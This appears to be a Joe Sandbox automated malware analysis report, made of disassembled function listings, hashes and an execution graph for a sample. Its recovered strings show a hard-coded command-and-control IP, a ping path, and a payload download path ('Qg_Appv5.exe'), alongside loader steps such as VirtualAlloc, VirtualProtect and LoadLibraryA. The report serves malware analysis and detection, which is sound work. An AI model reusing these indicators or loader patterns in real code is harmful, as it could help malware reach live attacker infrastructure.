                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Exception@8GetfacetH_prolog3InitSetgloballocaleThrowYarnstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: =wB
                                                                                                                                                                                                                                  • API String ID: 372095707-727605340
                                                                                                                                                                                                                                  • Opcode ID: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                  • Instruction ID: 2d279dcf16d24697fe27fde5ad404fd5c0ba339f6f24e3b825a7843aaa6ab342
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A42128B1A00B06AFD714DF69C199AA9FBF0FB08314F50866ED01997A80D7B4F964CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB4073 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB4078
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 05BB409A
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: __EH_prolog3.LIBCMT ref: 05BB7FE1
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::_Lockit.LIBCPMT ref: 05BB7FEC
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::locale::_Setgloballocale.LIBCPMT ref: 05BB8007
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: _Yarn.LIBCPMT ref: 05BB801D
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB805D
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: __EH_prolog.LIBCMT ref: 05BB43F5
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: std::_Lockit::_Lockit.LIBCPMT ref: 05BB4404
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: int.LIBCPMT ref: 05BB441B
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: std::locale::_Getfacet.LIBCPMT ref: 05BB4424
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB446B
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: __EH_prolog.LIBCMT ref: 05BB3656
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::_Lockit.LIBCPMT ref: 05BB3665
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: int.LIBCPMT ref: 05BB367C
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::locale::_Getfacet.LIBCPMT ref: 05BB3685
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB36CC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Getfacet$H_prolog3InitSetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID: wB
                                                                                                                                                                                                                                  • API String ID: 3898505750-480074513
                                                                                                                                                                                                                                  • Opcode ID: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                  • Instruction ID: 55622352972462707c32e80e53cc1cdf5a0b6eb10d1cc290a2438f2ccfd938a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70217F71A052049FEB18DF68D845BF9B7B5FF49310F20419ED8059B282DBF4A905CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                  • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004034E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                  • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                  • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB374A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                  • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                  • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction ID: 826ceb5a471e9bed9e5992a8d79c84724bd742a9a7b46f8b5e63ea9a07761ce1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D11CE72A00114BBEB059F89CC44BFEB7B9FF48610F504569F808E7240D3F0BA508BA1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID: T*@
                                                                                                                                                                                                                                  • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                  • Opcode ID: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                    • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                  • String ID: u@@
                                                                                                                                                                                                                                  • API String ID: 206117190-736001340
                                                                                                                                                                                                                                  • Opcode ID: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB1A6D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: [vB$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 3519838083-2429468811
                                                                                                                                                                                                                                  • Opcode ID: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                  • Instruction ID: d4e334683dff1b4155850ad540add33a1ab0e65ee55f717f368dd604af9b0a05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01BC72A001099FEB04EF98C494BFDFBB8EF49364F14809AE401A7250D7F56A45CBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042631A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD6581 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,05BD5DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05BD658B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: 4d0de2a029d56b9d225091c11390b85c83fe7d51e0c5da211efa26a66e7ceb72
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDE02C022048020A5F294E2A3829ABBDF03EFC6A5434882EBE8824B249CD412C4BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A7FD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCAA64 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05BCAAFA
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 05BCAB08
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05BCAB63
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                  • Instruction ID: 368f85d501a1beafafa22f9d5ac33099ada42be5ded147513b812145bea3d1b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F41C63060424AAFDB25DF64C848EBABFA7FF01714F1541EDE999AB1A0DB30A901C758
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:5.2%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:1106
                                                                                                                                                                                                                                  Total number of Limit Nodes:15
                                                                                                                                                                                                                                  execution_graph 44526 5ce003c 44527 5ce0049 44526->44527 44541 5ce0e0f SetErrorMode SetErrorMode 44527->44541 44532 5ce0265 44533 5ce02ce VirtualProtect 44532->44533 44535 5ce030b 44533->44535 44534 5ce0439 VirtualFree 44539 5ce05f4 LoadLibraryA 44534->44539 44540 5ce04be 44534->44540 44535->44534 44536 5ce04e3 LoadLibraryA 44536->44540 44538 5ce08c7 44539->44538 44540->44536 44540->44539 44542 5ce0223 44541->44542 44543 5ce0d90 44542->44543 44544 5ce0dad 44543->44544 44545 5ce0dbb GetPEB 44544->44545 44546 5ce0238 VirtualAlloc 44544->44546 44545->44546 44546->44532 44547 408273 44548 40828f 44547->44548 44549 4082ce 44548->44549 44552 40831c std::_Xfsopen 29 API calls 44548->44552 44556 4082db 44548->44556 44554 4082d5 44549->44554 44557 40831c 44549->44557 44552->44549 44554->44556 44563 40e228 44554->44563 44576 411d32 44557->44576 44559 4082ee 44559->44556 44560 4106ef 44559->44560 44637 41049b 44560->44637 44562 410705 44562->44554 44564 40e234 BuildCatchObjectHelperInternal 44563->44564 44565 40e245 44564->44565 44566 40e25a 44564->44566 44735 412381 20 API calls _abort 44565->44735 44575 40e255 std::_Xfsopen _Xfiopen 44566->44575 44718 40e81d EnterCriticalSection 44566->44718 44568 40e24a 44736 410905 26 API calls _Deallocate 44568->44736 44571 40e276 44719 40e1b2 44571->44719 44573 40e281 44737 40e29e LeaveCriticalSection __fread_nolock 44573->44737 44575->44556 44578 411c71 BuildCatchObjectHelperInternal 44576->44578 44577 411c8b 44601 412381 20 API calls _abort 44577->44601 44578->44577 44581 411cb8 44578->44581 44580 411c90 44602 410905 26 API calls _Deallocate 44580->44602 44582 411cca 44581->44582 44583 411cbd 44581->44583 44593 416499 44582->44593 44603 412381 20 API calls _abort 44583->44603 44587 411cd3 44588 411ce7 std::_Xfsopen 44587->44588 44589 411cda 44587->44589 44605 411d1b LeaveCriticalSection __fread_nolock _Xfiopen 44588->44605 44604 412381 20 API calls _abort 44589->44604 44590 411c9b std::_Xfsopen 44590->44559 44594 4164a5 BuildCatchObjectHelperInternal 44593->44594 44606 411a06 EnterCriticalSection 44594->44606 44596 4164b3 44607 416533 44596->44607 44600 4164e4 std::_Xfsopen 44600->44587 44601->44580 44602->44590 44603->44590 44604->44590 44605->44590 44606->44596 44616 416556 44607->44616 44608 4164c0 44621 4164ef 44608->44621 44609 4165af 44626 41704e 20 API calls 3 library calls 44609->44626 44611 4165b8 44627 41629a 44611->44627 44614 4165c1 44614->44608 44633 4175b5 11 API calls 2 library calls 44614->44633 44616->44608 44616->44609 44624 40e81d EnterCriticalSection 44616->44624 44625 40e831 LeaveCriticalSection 44616->44625 44618 4165e0 44634 40e81d EnterCriticalSection 44618->44634 44620 4165f3 44620->44608 44636 411a4e LeaveCriticalSection 44621->44636 44623 4164f6 44623->44600 44624->44616 44625->44616 44626->44611 44628 4162ce _free 44627->44628 44629 4162a5 RtlFreeHeap 44627->44629 44628->44614 44629->44628 44630 4162ba 44629->44630 44635 412381 20 API calls _abort 44630->44635 44632 4162c0 GetLastError 44632->44628 44633->44618 44634->44620 44635->44632 44636->44623 44641 4104a7 BuildCatchObjectHelperInternal 44637->44641 44638 4104b3 44662 412381 20 API calls _abort 44638->44662 44640 4104d9 44650 40e81d EnterCriticalSection 44640->44650 44641->44638 44641->44640 44642 4104b8 44663 410905 26 API calls _Deallocate 44642->44663 44644 4104e5 44651 4105fb 44644->44651 44647 4104c3 std::_Xfsopen 44647->44562 44648 4104f9 44664 410518 LeaveCriticalSection __fread_nolock 44648->44664 44650->44644 44652 41061d 44651->44652 44653 41060d 44651->44653 44665 410522 44652->44665 44678 412381 20 API calls _abort 44653->44678 44656 410612 44656->44648 44657 4106bf 44657->44648 44658 410640 _Xfiopen 44658->44657 44669 40dfcb 44658->44669 44662->44642 44663->44647 44664->44647 44666 41052e _Xfiopen 44665->44666 44667 410535 44665->44667 44666->44658 44667->44666 44668 419800 _Xfiopen 28 API calls 44667->44668 44668->44666 44670 40dfe3 44669->44670 44671 40dfdf 44669->44671 44670->44671 44679 4154e8 44670->44679 44675 419800 44671->44675 44673 40e003 44686 415fa3 62 API calls 7 library calls 44673->44686 44689 419767 44675->44689 44678->44656 44680 4154f4 44679->44680 44681 415509 44679->44681 44687 412381 20 API calls _abort 44680->44687 44681->44673 44683 4154f9 44688 410905 26 API calls _Deallocate 44683->44688 44685 415504 44685->44673 44686->44671 44687->44683 44688->44685 44698 41e97a 44689->44698 44691 419779 44692 419781 44691->44692 44693 419792 SetFilePointerEx 44691->44693 44711 412381 20 API calls _abort 44692->44711 44695 4197aa GetLastError 44693->44695 44697 419786 44693->44697 44712 41234b 20 API calls 3 library calls 44695->44712 44697->44657 44699 41e987 44698->44699 44700 41e99c 44698->44700 44713 41236e 20 API calls _abort 44699->44713 44705 41e9c1 44700->44705 44715 41236e 20 API calls _abort 44700->44715 44703 41e98c 44714 412381 20 API calls _abort 44703->44714 44705->44691 44706 41e9cc 44716 412381 20 API calls _abort 44706->44716 44707 41e994 44707->44691 44709 41e9d4 44717 410905 26 API calls _Deallocate 44709->44717 44711->44697 44712->44697 44713->44703 44714->44707 44715->44706 44716->44709 44717->44707 44718->44571 44720 40e1d4 44719->44720 44721 40e1bf 44719->44721 44724 40dfcb _Xfiopen 62 API calls 44720->44724 44726 40e1cf _Xfiopen 44720->44726 44757 412381 20 API calls _abort 44721->44757 44723 40e1c4 44758 410905 26 API calls _Deallocate 44723->44758 44727 40e1e8 44724->44727 44726->44573 44738 4165f6 44727->44738 44730 4154e8 _Xfiopen 26 API calls 44731 40e1f6 44730->44731 44742 41637e 44731->44742 44734 41629a _free 20 API calls 44734->44726 44735->44568 44736->44575 44737->44575 44739 